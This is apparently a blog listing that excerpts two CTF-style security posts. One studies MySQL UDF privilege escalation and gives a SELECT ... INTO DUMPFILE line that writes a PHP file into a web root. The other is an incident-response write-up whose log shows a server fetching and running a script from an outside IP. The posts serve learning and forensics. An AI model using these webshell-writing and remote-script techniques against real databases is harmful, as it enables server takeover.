MySQL UDF Privilege Escalation Explained

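MySQL UDF privilege escalation

The last time I worked on a challenge I ran into a UDF privilege escalation and could not solve it, so this is my catch-up study. It assumes basic access has already been obtained and privileges need to be escalated to mysql.

Gaining access

A brief list; this post mainly studies UDF privilege escalation techniques.

1. sqlmap --os-shell
2. Manual dumpfile
3. NDAY

webshell

- The web root directory is known
- MySQL root privileges are available
- secure_file_priv is empty, meaning no restriction

secure_file_priv can be queried with show global variables like '%secure_file_priv%'; a value of NULL means writing is not allowed.

    Variable_name       Value
    secure_file_priv

    SELECT '<?php phpinfo(); ?>' INTO DUMPFILE '/www/wwwroot/192.168.56.102_8083/phpinfo.php';

Manual UDF

A UDF (User Defined Function) is, as the name suggests, a user-defined function. It usually takes the form of a dynamic link library written in C: a dll on Windows and an so on Linux. So, loosely speaking, a UDF is a form of C code execution ...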

July 8, 2024 · 1 min · 151 words · neko

[Xuanji] Log Analysis - MySQL Incident Response

This challenge tests familiarity with penetration techniques against MySQL.

1. The first shell written by the attacker: flag{key string}
2. The IP of the attacker's reverse shell: flag{ip}
3. The md5 of the full path of the attacker's privilege escalation file: flag{md5} (note: /xxx/xxx/xxx/xxx/xxx.xx)
4. The privileges the attacker obtained: flag{value returned by whoami}

The IP of the attacker's reverse shell

The only ways I can think of to compromise MySQL are injection and takeover through a weak password. First, find the logs:

    root@xuanji:~# find / -name mysql
    /etc/init.d/mysql
    /etc/mysql
    /usr/bin/mysql
    /usr/lib/perl5/auto/DBD/mysql
    /usr/lib/perl5/DBD/mysql
    /usr/lib/mysql
    /usr/share/mysql
    /usr/share/php5/mysql
    /var/lib/mysql
    /var/lib/mysql/mysql
    /var/lib/php5/modules/apache2/enabled_by_maint/mysql
    /var/lib/php5/modules/cli/enabled_by_maint/mysql
    /var/lib/php5/modules/registry/mysql
    /var/log/mysql

After running cat on the log, the noteworthy content is:

    sh: 1: curl: not found
    --2023-08-01 02:14:11-- http://192.168.100.13:771/
    Connecting to 192.168.100.13:771... connected.
    HTTP request sent, awaiting response... 200 No headers, assuming HTTP/0.9
    Length: unspecified
    Saving to: 'index.html'
    0K 2.46 =2.0s
    2023-08-01 02:14:13 (2.46 B/s) - 'index.html' saved [5]
    /tmp/1.sh: line 1: --2023-08-01: command not found
    /tmp/1.sh: line 2: Connecting: command not found
    /tmp/1.sh: line 3: HTTP: command not found
    /tmp/1.sh: line 4: Length:: command not found
    /tmp/1.sh: line 5: Saving: command not found
    /tmp/1.sh: line 7: 0K: command not found
    /tmp/1.sh: line 9: syntax error near unexpected token `('
    /tmp/1.sh: line 9: `2023-08-01 02:16:35 (5.01 MB/s) - '1.sh' saved [43/43]'

The server downloaded a script from 192.168.100.13 and ran it. Run cat on the script ...

July 4, 2024 · 1 min · 195 words · neko